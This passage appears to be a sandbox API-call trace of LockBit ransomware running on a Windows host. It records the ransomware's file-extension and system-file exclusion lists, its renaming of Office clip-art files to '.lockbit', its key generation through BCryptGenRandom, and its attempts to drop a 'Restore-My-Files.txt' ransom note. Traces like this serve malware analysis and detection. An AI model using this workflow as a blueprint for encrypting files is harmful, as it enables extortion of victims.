lpString2="J0234001.WMF") returned -1 [0153.241] PathFindExtensionW (pszPath="J0234001.WMF") returned=".WMF" [0153.241] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.241] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.241] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.241] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.241] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.241] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.241] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.241] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.241] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.241] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.241] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.241] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.241] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.241] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.242] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.242] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.242] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.242] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.242] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.242] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.242] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.242] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.242] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.242] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.242] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.242] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.242] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.242] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.242] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.242] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.242] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.242] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.242] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.242] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.242] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.242] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.242] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.243] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.243] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.243] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.243] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.243] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.243] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.243] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.243] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.243] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.243] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.243] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0234001.WMF") returned 1 [0153.243] lstrcmpiW (lpString1="ntldr", lpString2="J0234001.WMF") returned 1 [0153.243] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0234001.WMF") returned 1 [0153.243] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0234001.WMF") returned -1 [0153.243] lstrcmpiW (lpString1="autorun.inf", lpString2="J0234001.WMF") returned -1 [0153.243] lstrcmpiW (lpString1="thumbs.db", lpString2="J0234001.WMF") returned 1 [0153.243] lstrcmpiW (lpString1="iconcache.db", lpString2="J0234001.WMF") returned -1 [0153.243] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.243] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0234001.WMF") returned=".WMF" [0153.243] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.243] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.243] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.244] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.244] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.244] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.244] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.244] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.244] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.244] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.244] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.244] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.244] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.244] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.244] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.244] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.244] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.244] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.244] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.244] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.244] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.244] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.244] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.244] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.244] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.245] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.245] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.245] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.245] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0234001.WMF.lockbit") returned 72 [0153.245] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0234001.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0234001.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0153.246] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.246] malloc (_Size=0x40068) returned 0x3ef0008 [0153.246] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=19264) returned 1 [0153.246] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.247] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.247] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0153.247] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.247] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.247] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0153.248] ReadFile (in: hFile=0x170, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0153.282] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0234001.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0234001.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.282] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.282] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0153.290] free (_Block=0x1fa2ed8) [0153.290] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0234001.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.290] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.290] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.290] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x660a4230, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x80d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0234376.WMF", cAlternateFileName="")) returned 1 [0153.290] lstrcmpiW (lpString1=".", lpString2="J0234376.WMF") returned -1 [0153.290] lstrcmpiW (lpString1="..", lpString2="J0234376.WMF") returned -1 [0153.290] PathFindExtensionW (pszPath="J0234376.WMF") returned=".WMF" [0153.291] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.291] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.291] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.291] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.291] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.291] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.291] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.291] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.291] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.291] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.291] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.291] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.291] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.291] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.291] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.291] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.291] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.291] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.291] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.291] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.291] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.291] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.291] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.291] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.291] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.291] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.291] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.291] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.291] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.292] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.292] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.292] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.292] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.292] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.292] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.292] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.292] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.292] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.292] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.292] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.292] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.292] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.292] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.292] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.292] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.292] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.292] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.292] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0234376.WMF") returned 1 [0153.292] lstrcmpiW (lpString1="ntldr", lpString2="J0234376.WMF") returned 1 [0153.292] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0234376.WMF") returned 1 [0153.292] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0234376.WMF") returned -1 [0153.292] lstrcmpiW (lpString1="autorun.inf", lpString2="J0234376.WMF") returned -1 [0153.292] lstrcmpiW (lpString1="thumbs.db", lpString2="J0234376.WMF") returned 1 [0153.292] lstrcmpiW (lpString1="iconcache.db", lpString2="J0234376.WMF") returned -1 [0153.292] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.292] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0234376.WMF") returned=".WMF" [0153.293] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.293] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.293] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.293] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.293] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.293] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.293] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.293] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.293] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.293] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.293] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.293] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.293] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.293] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.293] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.293] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.293] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.293] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.293] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.293] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.293] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.293] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.293] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.293] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.293] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.293] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.293] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.294] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.294] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0234376.WMF.lockbit") returned 72 [0153.294] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0234376.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0234376.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0153.296] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.296] malloc (_Size=0x40068) returned 0x3df0008 [0153.296] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=32980) returned 1 [0153.296] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.297] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.297] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0153.297] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.297] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.297] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0153.298] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.303] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0234376.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0234376.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.303] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.303] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0153.304] free (_Block=0x1fa2ed8) [0153.304] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0234376.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.304] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.304] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.305] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x660a4230, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xcba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0237225.WMF", cAlternateFileName="")) returned 1 [0153.305] lstrcmpiW (lpString1=".", lpString2="J0237225.WMF") returned -1 [0153.305] lstrcmpiW (lpString1="..", lpString2="J0237225.WMF") returned -1 [0153.305] PathFindExtensionW (pszPath="J0237225.WMF") returned=".WMF" [0153.305] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.305] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.305] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.305] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.305] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.305] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.305] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.305] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.305] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.305] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.305] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.305] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.305] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.305] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.305] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.305] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.305] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.305] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.306] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.306] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.306] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.306] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.306] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.306] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.306] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.306] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.306] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.306] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.306] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.306] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.306] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.306] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.306] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.306] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.306] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.306] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.306] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.306] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.306] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.306] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.306] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.306] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.306] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.307] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.307] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.307] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.307] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.307] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0237225.WMF") returned 1 [0153.307] lstrcmpiW (lpString1="ntldr", lpString2="J0237225.WMF") returned 1 [0153.307] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0237225.WMF") returned 1 [0153.307] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0237225.WMF") returned -1 [0153.307] lstrcmpiW (lpString1="autorun.inf", lpString2="J0237225.WMF") returned -1 [0153.307] lstrcmpiW (lpString1="thumbs.db", lpString2="J0237225.WMF") returned 1 [0153.307] lstrcmpiW (lpString1="iconcache.db", lpString2="J0237225.WMF") returned -1 [0153.307] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.307] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0237225.WMF") returned=".WMF" [0153.307] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.307] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.307] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.307] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.307] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.307] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.308] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.308] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.308] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.308] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.308] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.308] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.308] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.308] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.308] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.308] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.308] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.308] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.308] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.308] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.308] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.308] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.308] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.308] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.308] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.308] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.308] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.308] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.308] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: 